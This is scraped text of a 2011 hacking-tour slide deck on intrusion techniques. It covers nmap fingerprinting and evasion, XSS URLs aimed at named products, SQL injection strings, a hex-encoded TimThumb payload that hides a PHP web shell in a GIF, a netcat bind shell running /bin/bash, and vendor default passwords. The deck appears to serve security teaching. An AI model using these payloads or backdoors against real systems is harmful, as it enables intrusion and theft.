"intrusion techniques (open source tools)" por ewerson guimarães por

Ewerson Guimarães (Crash) DcLabs – HackingTour 2011

Intrusion TechniquesDcLabs Hacking Tour 2011


повестка дняповестка дня

отпечатков пальцевВеб-ошибокЗадняя дверьгрубая силашеллкодЭксплойтыСканеры

FingerPrint

The best tool for discovery operating systems, services, devices and others: NMAP (Network Mapper)

Basic commands:

nmap host (Basic)nmap –sV host (Service Versions)nmap –P0 host ( ICMP ECHO-REPLY Ignore)nmap –O host (Try to grab O.S version)nmap –f host (Firewall/IDS/IPS Evasion)

Grab informations about a target host. Ex: It's used to identify Operational System and/or Services(daemon) version number by TCP/IP response's unique characteristics.



Passive - FingerPrint

• TTL - When the operating system sets the Time To Live on the outbound packet

• Window Size - When the operating system sets the Window Size at.

• DF - =The operating system set the Don't Fragment bit.

• TOS - The operating system set the Type of Service, and if so, at what.


FingerPrintMatrix:


FingerPrintU. Bourne


FingerPrintIn BackTrack Linux you can find many softwares to

Finger-Print

Http://www.backtrack-linux.com


Web Vulnerability

Cross Site (XSS) – Reflected / Stored

SQL-Injection

PHP (LFI / RFI/ AFU / RCE)

These vulnerabilities are initially explored through malicious browser requests compromising the targetin a matter of minutes


Web VulnerabilityCross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users.

Spekx – Knowledge Base - http://server/pls/ksp_acesso.login_script?p_time=%221%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

LMS Web Ensino – TOTVShttp://site/lms/sistema/webensino/index.php?modo=resbusca_biblioteca&pChave=a%22%2F%3E+%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&Submit=Buscar

http://server/pls/ksp_acesso.login_script?p_time=%221%22%25


Web Vulnerability

Reflected / Stored Xss

DEMO


Web Vulnerability


What is the impact?

Why?

Examples?


Web VulnerabilitySQL-Injection

It occurs when the attacker can insert a series of SQL statements within a 'query' by manipulating the data entry application.

SELECT campos FROM tabela WHERE campo = '[email protected]';

Inject string: some' OR 'x'='x SELECT fields FROM table WHERE field = ‘some' OR 'x'='x';

admin'-- " or 0=0 # ' or 1=1-- hi' or 'a'='a' or 0=0 -- or 0=0 # " or 1=1-- hi') or ('a'='a" or 0=0 -- ' or 'x'='x or 1=1-- hi") or ("a"="aor 0=0 -- " or "x"="x ' or a=a-- ‘);Drop table x;--' or 0=0 # ') or ('x'='x hi" or 1=1 -- ') or ('a'='a


SQL-Injection

LIVE DEMO OCOMONThrowing fudge at the fan


Web VulnerabilityCGI/PHP Command Injection

It occurs when the attacker insert a series of commands exploiting vulnerable CGI/PHP scripts

OneorZero – AFU + LFI

http://server/oneorzero/index.php?controller=../[FILE].php

WordPress TimThumb (Theme) Plugin – RCE

\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00


Default/Weak passwordsDefault passwords are set by its manufacturers/developers and were not changed after the installation/configuration.

As supplied by the system vendor and meant to be changed at installation time (Nobody do this shit)

Ex: Sw 3Com: User: security - Pass: security

FireBird:User: sysdba - Pass: masterkeyy

Weak: Passwords that are easily guessed or in a keyboard sequential Ex: 123456 - Love - House´s phone - Birthday - Etc...


Brute Force

It consists in using random combinations of characters/numbers and symbols, wordlists and/or string generators to crack a password

Ex:John the Ripper HydraSSH Brute Force


Brute ForceDirBuster - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers


ExploitsKinds of Exploits:

Local: Usually, the objective of a local exploit is to elevateuser's privileges on the machine as close as possible to root (uid=0) or administrator. They are written to exploitkernel bugs or suid binaries

Remote: It works over a network connection and exploit the vulnerable target without any prior access to it.

www.securityfocus.comwww.secunia.comwww.exploit-db.com

0Days It works usually an unpublished exploit from a brand new found vulnerability. You can buy! $$$$$

http://www.exploit-db.com/


Exploits

If Kernel was patched?Will we cry?

AlexosAlexos=>=>


Exploits

No!!!! Fuck him!!!We have others ways to pwn the box

GNU C library dynamic linker GNU C library dynamic linker

Suid´sSuid´s

Etc...


Backdoors/RootKitsUsed to maintain access to the system

We can Netcat use for this purpose: nc –vv –l –p 5555nc –vv –l –p 5555 –e /bin/bashnc <ip> <port>

RootKits

The main purpose of a rootkit is to hide the attacker's presencereplacing vital system binaries from target's systemExample: Hide files (with match strings) Run command when match strings Hide processes Hide open ports, and others.


Scanners/FuzzersThere are 2 types of scanners: Specific which are written fora specific vulnerability (BSQLHacker, SQLMAP) and Genericwhich are written for various kinds of vulnerabilities. Genericscanners use known service banners/strings to locate the potential target/vulnerabilities

W3afNessus


Scanners/Fuzzers


SniffersSniffer monitors and analyzes network traffic. Some of these packets may contain critical information (such as logins, passwords and cool infos )WhireShark -


MetaSploit


MetaSploit

Let´s Fuck Windows?


Hardening your server

HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system for vulnerabilities or problems in configuration files allowing you to get a quick overview of the security status of your system.


Questions?

Contact

Crash - [email protected]

Irc: irc.freenode.net #dclabs

twitter: @crashbrz


"intrusion techniques (open source tools)" por ewerson guimarães por

Technology